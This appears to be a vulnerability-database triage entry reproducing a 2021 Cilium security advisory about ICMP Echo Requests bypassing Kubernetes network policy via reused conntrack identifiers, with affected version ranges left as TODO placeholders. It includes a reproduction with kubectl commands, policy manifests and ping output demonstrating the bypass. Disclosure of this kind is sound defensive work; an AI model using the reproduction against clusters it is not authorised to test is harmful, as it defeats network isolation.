package: github.com/cilium/cilium
additional_packages:
- package: github.com/cilium/cilium
versions:
- introduced: TODO (earliest fixed "1.8.8", vuln range ">= 1.8.3, <= 1.8.7")
- package: github.com/cilium/cilium
versions:
- introduced: TODO (earliest fixed "1.7.15", vuln range ">= 1.7.8, <= 1.7.14")
versions:
- introduced: TODO (earliest fixed "1.9.5", vuln range ">= 1.9.0, <= 1.9.4")
description: "## Impact\n\nUnder certain conditions, ICMP Echo Request sent to a Cilium
endpoint from an actor may bypass a network policy which _disallows_ access from
the actor to the endpoint, but _allows_ from the endpoint to the actor. This does
_NOT_ apply to UDP and TCP traffic.\n\nThe actor is either a pod or a cluster
host or a remote host.\n\nThe following conditions must be met:\n1. Network policies
have been created which:\n a) do not allow access from the actor to the endpoint;\n
\ b) allow access from the endpoint to the actor and does not specify neither
protocol nor port. \n2. The endpoint has sent ICMP Echo Request to the actor with
the ICMP identifier X.\n3. The actor sends ICMP Echo Request to the endpoint with
the same ICMP identifier X.\n4. The request from the actor (3.) is sent before
the Cilium's conntrack GC has removed the previously created conntrack entry (2.).\n\n##
Detailed description\n\nSee https://github.com/cilium/cilium/commit/dfb008a9099c4da1e0fd964c899c43ee13280b0e
(v1.9.x), https://github.com/cilium/cilium/commit/ff6ebae6efca1bd991302b464dea428512823e79
(v1.8.x), https://github.com/cilium/cilium/commit/472bbeff75161979c317ab21d563f826291b5f37
(v1.7.x).\n\n## Example\n\n```\n$ kubectl run server --image=quay.io/cilium/net-test:v1.0.0
--restart=Never -- sleep 3600\n$ kubectl run client --image=quay.io/cilium/net-test:v1.0.0
--restart=Never -- sleep 3600\n$ cat <<EOF | kubectl apply -f\napiVersion: networking.k8s.io/v1\nkind:
NetworkPolicy\nmetadata:\n name: server-netpol # allow client->server\nspec:\n
\ podSelector:\n matchLabels:\n run: server\n ingress:\n - from:\n -
podSelector:\n matchLabels:\n run: client\n policyTypes:\n -
Ingress\n---\napiVersion: networking.k8s.io/v1\nkind: NetworkPolicy\nmetadata:\n
\ name: client-netpol # deny any->client\nspec:\n podSelector:\n matchLabels:\n
\ run: client\n policyTypes:\n - Ingress\nEOF\n\n$ kubectl exec -ti server
-- xping -c1 -x666 $CLIENT_POD_IP\nPING 10.154.0.50 (10.154.0.50): 56 data bytes\n^C\n---
10.154.0.50 ping statistics ---\n1 packets transmitted, 0 packets received, 100%
packet loss <--- \"client-netpol\" policy denied\ncommand terminated with exit
code 1\n\n$ kubectl exec -ti client -- xping -c1 -x666 $SERVER_POD_IP\nPING 10.154.1.16
(10.154.1.16): 56 data bytes\n64 bytes from 10.154.1.16: seq=0 ttl=60 time=0.822
ms\n\n--- 10.154.1.16 ping statistics ---\n1 packets transmitted, 1 packets received,
0% packet loss <--- \"server-netpol\" policy allowed\nround-trip min/avg/max
= 0.822/0.822/0.822 ms\n\n$ kubectl exec -ti server -- xping -c1 -x666 $CLIENT_POD_IP\nPING
10.154.0.50 (10.154.0.50): 56 data bytes\n64 bytes from 10.154.0.50: seq=0 ttl=60
time=0.527 ms\n\n--- 10.154.0.50 ping statistics ---\n1 packets transmitted, 1
packets received, 0% packet loss <--- \"client-netpol\" policy bypassed\nround-trip
min/avg/max = 0.527/0.527/0.527 ms\n```\n\n## For more information\n\nIf you have
any questions or comments about this advisory:\n\n- Open an issue in [Cilium Issues](https://github.com/cilium/cilium/issues)\n-
Email us at security@cilium.io"
published: 2021-05-21T14:32:37Z
last_modified: 2021-05-21T14:32:37Z
ghsas:
- GHSA-c66w-hq56-4q97
In GitHub Security Advisory GHSA-c66w-hq56-4q97, there is a vulnerability in the following Go packages or modules:
See doc/triage.md for instructions on how to triage this report.